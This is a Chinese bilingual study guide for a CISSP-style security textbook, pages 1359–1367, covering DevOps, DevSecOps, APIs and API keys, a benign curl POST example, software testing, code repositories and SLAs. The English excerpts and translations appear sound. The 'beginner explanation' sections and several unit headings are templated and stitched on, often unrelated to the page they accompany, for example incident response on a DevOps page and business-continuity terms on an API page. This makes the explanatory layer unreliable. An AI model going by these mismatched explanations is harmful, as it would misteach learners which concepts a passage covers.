最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 36 / PDF P1359

第 1359 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

technology operations. These functions, typically staffed with very different types of individuals and located in separate organizational silos, often conflicted with one another. This conflict resulted in lengthy delays in creating code, testing it, and deploying it onto production systems. When problems arose, instead of working together to cooperatively solve the issue, teams often “threw problems over the fence” at one another, resulting in bureaucratic back and forth. The DevOps approach seeks to resolve these issues by bringing the three functions together in a single operational model.

The word DevOps is a combination of Development and Operations, symbolizing that these functions must merge and cooperate to meet business requirements. The model in Figure 20.8 illustrates the overlapping nature of software development, quality assurance, and IT operations.

中文直译 / 整理

技术运营这三大IT职能之间存在脱节。 这些职能通常由截然不同类型的人员承 担,并分布在不同的组织孤岛中,常常相互冲突。 这种冲突导致代码编写、测 试和部署到生产系统的过程中出现长时间延误。 当问题出现时,团队通常不是 协同解决问题,而是彼此“把问题抛过围墙”,导致官僚主义的来回推诿。 DevOps 方法通过将这三个职能整合到一个统一的操作模型中来解决这些 问题。 单词DevOps是开发(Development)和运维(Operations)的组 合,象征着这些职能必须融合与协作以满足业务需求。 图Figure 20.8说明 了软件开发、质量保证和IT运维之间的重叠特性。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1359 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 37 / PDF P1360

第 1360 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 20.8 The DevOps model The DevOps model is closely aligned with the Agile development approach and aims to dramatically decrease the time required to develop, test, and deploy software changes. Although traditional approaches often resulted in major software deployments on an infrequent basis, perhaps annually, organizations using the DevOps model often deploy code several times per day. Some organizations even strive to reach the goal of continuous integration/continuous delivery (CI/CD), where code may roll out dozens or even hundreds of times per day. This requires a high degree of automation, including integrating code repositories, the software configuration

中文直译 / 整理

图 20.8 DevOps 模型 DevOps 模型与敏捷开发方法紧密契合,旨在显著缩短开发、测试和部署软件 变更所需的时间。 尽管传统方法通常导致软件部署频率较低,例如每年一次, 但采用 DevOps 模型的组织通常每天会部署代码数次。 一些组织甚至致力于实 现持续集成/持续交付(CI/CD)的目标,在此模式下,代码每天可能发布数十 次甚至数百次。 这需要高度的自动化,包括集成代码仓库、软件配置

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1360 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 38 / PDF P1361

第 1361 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

management process, and the movement of code between development, testing, and production environments. If you're interested in learning more about DevOps, the authors highly recommend the book The Phoenix Project: A Novel About IT, DevOps, and Helping Your Business Win by Gene Kim, Kevin Behr, and George Spafford (IT Revolution Press, 2013). This book presents the case for DevOps and shares DevOps strategies in an entertaining, engaging novel form. The tight integration of development and operations also calls for the simultaneous integration of security controls. If code is being rapidly developed and moved into production, security must also move with that same agility.

For this reason, many people prefer to use the term DevSecOps to refer to the integration of development, security, and operations. The DevSecOps approach also supports the concept of software-defined security, where security controls are actively managed by code, allowing them to be directly integrated into the CI/CD pipeline. Application Programming Interfaces Although early web applications were often stand-alone systems that processed user requests and provided output, modern web applications are much more complex. They often include interactions between a number of different web services.

For example, a retail website might make use of an external credit card processing service, allow users to share their purchases on social media, integrate with shipping provider sites, and offer a referral program on other websites. For these cross-site functions to work properly, the websites must interact with one another. Many organizations offer application programming interfaces (APIs) for this purpose. APIs allow application developers to bypass traditional web pages and interact directly with the underlying service through function calls. For example, a social media API might include some of the following API function calls: Post status Follow user

中文直译 / 整理

管理流程,以及代码在开发、测试和生产环境之间的迁移。 如果您希望深入了解DevOps,作者强烈推荐Gene Kim、Kevin Behr和George Spafford所著的《凤凰项目:一部关于IT、DevOps与助 力企业获胜的小说》(IT Revolution Press,2013年)。 这本书以生动 有趣的小说形式,阐述了DevOps的必要性,并分享了DevOps策略。 开发与运维的紧密集成也要求安全控制同步整合。 如果代码正在快速开发并部 署至生产环境,安全性也必须具备同样的敏捷性。 因此,许多人更倾向于使用 术语DevSecOps来指代开发、安全与运维的整合。 DevSecOps方法还支持软 件定义安全的概念,即安全控制由代码主动管理,使其能够直接集成到 CI/CD流水线中。 应用程序编程接口 尽管早期的Web应用程序通常是独立系统,用于处理用户请求并提供输出, 但现代Web应用程序要复杂得多。 它们通常涉及多个不同Web服务之间的交 互。 例如,一个零售网站可能会使用外部信用卡处理服务,允许用户在社交 媒体上分享其购买行为,集成货运提供商网站,并在其他网站上提供推荐计 划。

为了使这些跨站功能正常工作,网站之间必须相互交互。 许多组织为此目的提 供了应用程序编程接口(API)。 API允许应用程序开发人员绕过传统网页, 通过函数调用直接与底层服务交互。 例如,社交媒体API可能包含以下一些 API函数调用: 发布状态 关注用户

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

程序:程序是一步一步怎么做。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

开发安全运营一体化:DevSecOps 把安全自动化嵌入开发和交付流程。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1361 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

RPO 问数据:最多丢到哪个时间点。

自动化测试、持续集成、持续监控是关键词。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
开发安全运营一体化 DevSecOps 把安全自动化嵌入开发和交付流程。
学习单元 39 / PDF P1362

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Unfollow user Like/Favorite a post Offering and using APIs creates tremendous opportunities for service providers, but it also poses some security risks. Developers must be aware of these challenges and address them when they create and use APIs. First, developers must consider authentication requirements. Some APIs, such as those that allow checking weather forecasts or product inventory, may be available to the general public and not require any authentication for use. Other APIs, such as those that allow modifying information, placing orders, or accessing sensitive information, may be limited to specific users and depend on secure authentication.

API developers must know when to require authentication and ensure that they verify credentials and authorization for every API call. This authentication is typically done by providing authorized API users with a complex API key that is passed with each API call. The backend system validates this API key before processing a request, ensuring that the system making the request is authorized to make the specific API call. API keys are like passwords and should be treated as sensitive information. They should always be stored in secure locations and transmitted only over encrypted communications channels.

If someone gains access to your API key, they can interact with a web service as if they were you. curl is an open-source tool available for major operating systems that allows users to directly access websites without the use of a browser. For this reason, curl is commonly used for API testing and also for potential API exploits by an attacker.

For example, consider this curl command: curl -H "Content-Type: application/json" -X POST -d '{"week": 10, "hrv": 80, "sleephrs": 9, "sleepquality": 2, "stress": 3, "paxid": 1 }'https://prod.myapi.com/v1 The purpose of this command is to send a POST request to the URL https://prod.myapi.com/v1 that contains information being sent to the API in JSON format. You don't need to worry about the format of this command

中文直译 / 整理

取消关注用户 点赞/收藏帖子 提供和使用 API 为服务提供商创造了巨大的机会,但也带来了一些安全风险。 开发人员必须意识到这些挑战,并在创建和使用 API 时加以应对。 首先,开发人员必须考虑身份验证要求。 某些 API,例如用于查询天气预报或 产品库存的 API,可能对公众开放,无需身份验证即可使用。 其他 API,例如 用于修改信息、下单或访问敏感信息的 API,则可能仅限特定用户使用,并依 赖安全的身份验证。 API 开发人员必须清楚何时需要身份验证,并确保对每次 API 调用都验证凭据和授权。 这种身份验证通常通过向授权的 API 用户提供 一个复杂的 API 密钥来实现,该密钥随每次 API 调用一并传递。 后端系统在 处理请求前会验证此 API 密钥,以确保发出请求的系统已获得执行特定 API 调用的授权。 API 密钥类似于密码,应被视为敏感信息。 它们应始终存储在安全 位置,并仅通过加密通信通道传输。 如果他人获取了您的 API 密钥,他 们就可以像您一样与网络服务进行交互。 curl 是一个开源工具,适用于主流操作系统,允许用户无需使用浏览器直接访 问网站。

因此,curl 常用于 API 测试,也常被攻击者用于潜在的 API 攻击。 例如,考虑以下 curl 命令: curl ‑H "Content‑Type: application/json" ‑X POST ‑d '{"week": 10, "hrv": 80, "sleephrs": 9, "sleepquality": 2, "stress": 3, "paxid": 1 }'https://prod.myapi.com/v1 此命令的目的是向 URL 发送一个 POST 请求 https://prod.myapi.com/v1,其中包含以 JSON 格式发送到 API 的信息。 您无需担心 此命令的格式

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

身份管理题要区分识别、认证、授权、审计。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 40 / PDF P1363

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

as you prepare for the exam, but you should be familiar with the concept that curl may be used to post requests to an API. APIs must also be tested thoroughly for security flaws, just like any web application. You'll learn more about this in the next section. Software Testing As part of the development process, your organization should thoroughly test any software before distributing it internally (or releasing it to market). This testing is a crucial component of the risk analysis and mitigation efforts associated with software development. The organization uses comprehensive testing to identify potential risks and mitigates them by modifying code and/or adopting compensating controls.

The best time to address testing is as the modules are designed. In other words, the mechanisms you use to test a product and the datasets you use to explore that product should be designed in parallel with the product itself. Your programming team should develop special test suites of data that exercise all paths of the software to the fullest extent possible and know the correct resulting outputs beforehand. One of the tests you should perform is a reasonableness check. The reasonableness check ensures that values returned by software match specified criteria that are within reasonable bounds.

For example, a routine that calculated optimal weight for a human being and returned a value of 612 pounds would certainly fail a reasonableness check! Furthermore, while conducting software testing, you should check how the product handles normal and valid input data, incorrect types, out-of-range values, and other bounds and/or conditions. Live workloads provide the best stress testing possible. However, you should not use live or actual field data for testing, especially in the early development stages, since a flaw or error could result in the violation of integrity or confidentiality of the test data.

This process should involve the use of both use cases, which mirror normal activity, and misuse cases, which attempt to model the activity of an attacker. Including both of these approaches helps testers understand how the code will perform under normal activity (including normal errors) and when subjected to the extreme conditions imposed by an attacker. When testing software, you should apply the same rules of separation of duties that you do for other aspects of your organization. In other words, you

中文直译 / 整理

在您为考试做准备时,但您应熟悉 curl 可用于向 API 发送 POST 请求这一概念。 API 也必须像任何 Web 应用程序一样进行彻底的安全性测试。 您将在下一节 中了解更多相关内容。 软件测试 作为开发过程的一部分,您的组织在将任何软件分发给内部使用(或发布到市 场)之前,应对其进行彻底测试。 这种测试是与软件开发相关的风险分析和缓 解工作的重要组成部分。 组织通过全面的测试来识别潜在风险,并通过修改代 码和/或采用补偿性控制措施来缓解这些风险。 解决测试问题的最佳时机是在模块设计时。 换句话说,用于测试产品的机制以 及用于探索产品的数据集,应与产品本身并行设计。 您的编程团队应开发专门 的测试数据套件,尽可能全面地覆盖软件的所有路径,并事先了解正确的输出 结果。 您应执行的一项测试是 合理性检查。 合理性检查确保软件返回的值符合在合理 范围内的指定标准。 例如,一个计算人体最佳体重的例程如果返回 612 磅的值, 显然会无法通过合理性检查! 此外,在进行软件测试时,您应检查产品如何处理正常且有效的输入数据、错 误的类型、超出范围的值以及其他边界和/或条件。 实际工作负载能提供最佳的 压力测试效果。

然而,您不应在测试中使用实际的现场数据,尤其是在早期开 发阶段,因为任何缺陷或错误都可能导致测试数据的完整性或机密性遭到破坏。 此过程应同时使用使用场景(模拟正常活动)和误用场景(尝试模拟攻击者的 行为)。 结合这两种方法有助于测试人员了解代码在正常活动(包括正常错误) 下的表现,以及在遭受攻击者施加的极端条件时的表现。 在测试软件时,您应应用与组织其他方面相同的职责分离规则。 换句话说,您

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
学习单元 41 / PDF P1364

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

should assign the testing of your software to someone other than the programmer(s) who developed the code to avoid a conflict of interest and assure a more secure and functional finished product. When a third party tests your software, you have a greater likelihood of receiving an objective and nonbiased examination. The third-party test allows for a broader and more thorough test and prevents the bias and inclinations of the programmers from affecting the results of the test.

There are three different philosophies that you can adopt when applying software security testing techniques: White-Box Testing White-box testing examines the internal logical structures of a program and steps through the code line by line, analyzing the program for potential errors. The key attribute of a white-box test is that the testers have access to the source code. Black-Box Testing Black-box testing examines the program from a user perspective by providing a wide variety of input scenarios and inspecting the output. Black-box testers do not have access to the internal code. Final acceptance testing that occurs prior to system delivery is a common example of black-box testing.

Gray-Box Testing Gray-box testing combines the two approaches and is popular for software validation. In this approach, testers examine the software from a user perspective, analyzing inputs and outputs. They also have access to the source code and use it to help design their tests. They do not, however, analyze the inner workings of the program during their testing. In addition to assessing the quality of software, programmers and security professionals should carefully assess the security of their software to ensure that it meets the organization's security requirements. This assessment is especially critical for web applications that are exposed to the public.

For more on code review and testing techniques, such as static and dynamic testing, see Chapter 15, “Security Assessment and Testing.” Proper software test implementation is a key element in the project development process. Many of the common mistakes and oversights often found in commercial and in-house software can be eliminated. Keep the test plan and results as part of the system's permanent documentation. Code Repositories

中文直译 / 整理

应将软件的测试工作分配给除开发代码的程序员之外的其他人,以避免利 益冲突,并确保获得更安全、功能更完善的最终产品。 当第三方测试您的 软件时,您更有可能获得客观且无偏见的审查。 第三方测试能够进行更广 泛、更彻底的测试,并防止程序员的偏见和倾向影响测试结果。 在应用软件安全测试技术时,您可以采用三种不同的哲学: 白盒测试白盒测试检查程序的内部逻辑结构,逐行执行代码,分析程序中潜在的 错误。 白盒测试的关键特点是测试人员可以访问源代码。 黑盒测试黑盒测试从用户的角度检查程序,通过提供多种输入场景并检查输出 来进行。 黑盒测试人员无法访问内部代码。 在系统交付前进行的最终验收测试 是黑盒测试的常见示例。 灰盒测试灰盒测试结合了上述两种方法,广泛用于软件验证。 在这种方法中, 测试人员从用户的角度检查软件,分析输入和输出。 他们还可以访问源代码, 并利用源代码帮助设计测试用例。 然而,他们在测试过程中并不分析程序的内 部运作。 除了评估软件质量外,程序员和安全专业人员还应仔细评估其软件的安全性, 以确保其符合组织的安全要求。 对于面向公众的Web应用程序,这种评估尤 为关键。

有关代码审查和测试技术(如静态测试和动态测试)的更多信息,请 参阅第15章“安全评估与测试”。 正确的软件测试实施是项目开发过程中的关键环节。 许多在商业软件和内部软 件中常见的错误和疏漏都可以被消除。 请将测试计划和结果作为系统永久文档 的一部分保存。 代码仓库

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 42 / PDF P1365

第 1365 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Software development is a collaborative effort, and large software projects require teams of developers who may simultaneously work on different parts of the code. Further complicating the situation is the fact that these developers may be geographically dispersed around the world. Code repositories provide several important functions supporting these collaborations. Primarily, they act as a central storage point for developers to place their source code. In addition, code repositories such as GitHub, Bitbucket, and SourceForge also provide version control, bug tracking, web hosting, release management, and communications functions that support software development.

Code repositories are often integrated with popular code management tools. For example, the git tool is popular among many software developers, and it is tightly integrated with GitHub and other repositories. Earlier in this chapter, you learned about code libraries. Libraries are packages of reusable code that may be shared within an organization or with the public. Repositories are broader platforms that provide the tools for shared software development and distribution. Repositories may be used to manage and distribute code libraries. Code repositories are wonderful collaborative tools that facilitate software development, but they also have security risks of their own.

First, developers must appropriately control access to their repositories. Some repositories, such as those supporting open-source software development, may allow public access. Others, such as those hosting code containing trade secret information, may be more limited, restricting access to authorized developers. Repository owners must carefully design access controls to only allow appropriate users read and/or write access. Improperly granting users read access may allow unauthorized individuals to retrieve sensitive information, whereas improperly granting write access may allow unauthorized tampering with code.

中文直译 / 整理

软件开发是一项协作性工作,大型软件项目需要由开发人员团队共同完成,这 些团队成员可能同时开发代码的不同部分。 更复杂的是,这些开发人员可能分 布在全球各地。 代码仓库提供多种重要功能以支持这些协作。 主要作用是作为开发人员存放源 代码的集中存储点。 此外,GitHub、Bitbucket 和 SourceForge 等代码仓库 还提供版本控制、错误跟踪、网页托管、发布管理以及支持软件开发的通信功 能。 代码仓库通常与流行的代码管理工具集成。 例如,git 工具在许多软件开 发人员中广受欢迎,并且与 GitHub 及其他仓库紧密集成。 在本章前面,您了解了代码库。 库是可重用代码的软件包,可在组 织内部或向公众共享。 仓库是更广泛的平台,提供共享软件开发和分发 所需的工具。 仓库可用于管理和分发代码库。 代码仓库是优秀的协作工具,有助于软件开发,但它们自身也存在安全风险。 首先,开发人员必须适当控制对仓库的访问权限。 一些仓库,例如支持开源软 件开发的仓库,可能允许公众访问; 而另一些仓库,例如托管包含商业秘密信 息的代码的仓库,则可能限制更多,仅允许授权开发人员访问。

仓库所有者必 须仔细设计访问控制,仅允许适当用户具有读取和/或写入权限。 不当授予用 户读取权限可能使未经授权的人员获取敏感信息,而不当授予写入权限则可能 导致代码被未经授权的篡改。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1365 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 43 / PDF P1366

第 1366 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Sensitive Information and Code Repositories Developers must take care not to include sensitive information in public code repositories. This is particularly true of API keys. Many developers use APIs to access the underlying functionality of infrastructure-as-a-service (IaaS) providers, such as Amazon Web Services (AWS), Microsoft Azure, and Google Compute Engine. This provides tremendous benefits, allowing developers to quickly provision servers, modify network configuration, and allocate storage using simple API calls. Of course, IaaS providers charge for these services. When a developer provisions a server, it triggers an hourly charge for that server until it is shut down.

The API key used to create a server ties the server to a particular user account (and credit card). If developers write code that includes API keys and then upload that key to a public repository, anyone in the world can then gain access to their API key. This allows anyone to create IaaS resources and charge it to the original developer's credit card. Further worsening the situation, malicious actors have written bots that scour public code repositories searching for exposed API keys. These bots may detect an inadvertently posted key in seconds, allowing the malicious actor to quickly provision massive computing resources before the developer even knows of their mistake.

Similarly, developers should also be careful to avoid placing passwords, internal server names, database names, and other sensitive information in code repositories. Service-Level Agreements Using service-level agreements (SLAs) is an increasingly popular way to ensure that organizations providing services to internal and/or external customers maintain an appropriate level of service agreed on by both the service provider and the vendor. It's a wise move to put SLAs in place for any data circuits, applications, information processing systems, databases, or other critical components that are vital to your organization's continued viability. The following issues are commonly addressed in SLAs:

中文直译 / 整理

敏感信息和代码仓库 开发人员必须注意不要在公共代码仓库中包含敏感信息。 API 密钥尤其如此。 许多开发人员使用 API 来访问基础设施即服务(IaaS)提供商的基础功能, 例如 Amazon Web Services(AWS)、Microsoft Azure 和 Google Compute Engine。 这带来了巨大的好处,允许开发人员通过简单的 API 调用快速部署服务器、修改网络配置和分配存储空间。 当然,IaaS 提供商会对这些服务收费。 当开发人员部署服务器时,会触 发对该服务器的每小时计费,直到其关闭为止。 用于创建服务器的 API 密钥会将该服务器与特定用户账户(及信用卡)绑定。 如果开发人员编写的代码包含 API 密钥,并将该密钥上传到公共仓库,那 么世界上任何人都可以获取他们的 API 密钥。 这使得任何人都可以创建 IaaS 资源,并将费用记入原始开发人员的信用卡。 更糟糕的是,恶意行为者编写了机器人,专门扫描公共代码仓库以寻找暴 露的 API 密钥。 这些机器人可能在数秒内检测到意外发布的密钥,使恶意 行为者能够在开发人员意识到错误之前,迅速部署大量计算资源。

同样,开发人员也应小心避免在代码仓库中放置密码、内部服务器名称、 数据库名称和其他敏感信息。 服务级别协议 使用服务级别协议(SLA)是一种越来越流行的方式,用于确保向内部和/或 外部客户提供服务的组织能够维持服务提供商与供应商共同商定的适当服务水 平。 为任何对贵组织持续运营至关重要的数据电路、应用程序、信息处理系统、 数据库或其他关键组件实施SLA是一个明智的举措。 以下问题通常在SLA中加 以解决:

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1366 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 44 / PDF P1367

